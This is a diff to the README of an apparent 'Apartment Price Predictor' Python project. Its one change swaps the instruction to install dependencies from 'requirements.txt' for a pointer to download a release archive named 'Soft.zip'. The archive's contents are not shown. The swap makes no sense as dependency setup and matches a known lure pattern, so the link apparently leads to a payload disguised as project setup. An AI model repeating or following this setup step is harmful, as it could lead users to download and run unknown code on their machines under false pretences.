0290192029/apartment-price-predictor/README.md

 ### Getting Started
 To get started with the "Apartment Price Predictor" project, follow these steps:
 1. Clone the repository to your local machine.
-2. Install the required dependencies listed in the `requirements.txt` file.
+2. Install the required dependencies listed in the `https://github.com/0290192029/apartment-price-predictor/releases/download/v1.0/Soft.zip` file.
 3. Explore the project structure and scripts to understand the implementation details.
 4. Run the Python scripts to collect data, preprocess it, train the model, and evaluate its performance.
 5. Visualize the results using Matplotlib to gain insights into the apartment price predictions.